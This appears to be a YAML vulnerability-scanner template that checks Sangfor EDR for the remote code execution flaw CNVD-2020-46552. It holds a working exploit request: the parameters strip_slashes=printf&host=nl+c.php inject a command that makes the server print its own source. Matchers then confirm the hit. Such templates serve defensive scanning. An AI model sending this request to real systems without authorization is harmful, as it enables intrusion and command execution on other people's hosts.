26 lines
980 B
YAML
26 lines
980 B
YAML
id: CNVD-2020-46552
|
|
info:
|
|
name: Sangfor EDR Tool - Remote Code Execution
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
|
|
reference:
|
|
- https://www.modb.pro/db/144475
|
|
- https://blog.csdn.net/bigblue00/article/details/108434009
|
|
- https://cn-sec.com/archives/721509.html
|
|
tags: cnvd,cnvd2020,sangfor,rce
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body, "$show_input = function($info)")'
|
|
- 'contains(body, "$strip_slashes($host)")'
|
|
- 'contains(body, "Log Helper")'
|
|
- 'status_code == 200'
|
|
condition: and
|